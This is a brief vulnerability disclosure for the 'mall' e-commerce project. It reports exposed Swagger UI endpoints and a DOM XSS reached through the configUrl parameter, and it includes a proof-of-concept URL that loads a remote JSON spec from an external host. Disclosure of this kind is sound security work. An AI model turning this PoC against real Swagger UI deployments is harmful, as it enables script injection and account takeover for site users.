A vulnerability report has already been submitted at https://github.com/macrozheng/mall/issues/919,
but it was deleted by the MALL maintainer.
Due to improper access control settings for Swagger-related interfaces, attackers are allowed to access internal API documentation, and one of the interfaces exists a DOM XSS vulnerability.
Due to improper access control settings for Swagger-related interfaces, attackers are allowed to access internal API documentation, and one of the interfaces contains an XSS vulnerability.
Swagger UI has an interesting feature that allows you to provide URL to API specification - a yaml or json file that will be fetched and displayed to the user. To do that you have to add query parameter ?url=https://your_api_spec/spec.yaml or ? configUrl=https://your_api_spec/file.json.
The first obvious thing is that if we can bypass the sanitizer(html), we will have really easy DOM XSS thanks to a dangerouslySetInnerHTML. React will simply render ANY HTML and allow us to execute the JS payload.
IDOR:
http://127.0.0.1:7001/swagger-ui/
XSS
http://127.0.0.1:7001/swagger-ui/index.html?configUrl=https://jumpy-floor.surge.sh/test.json
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/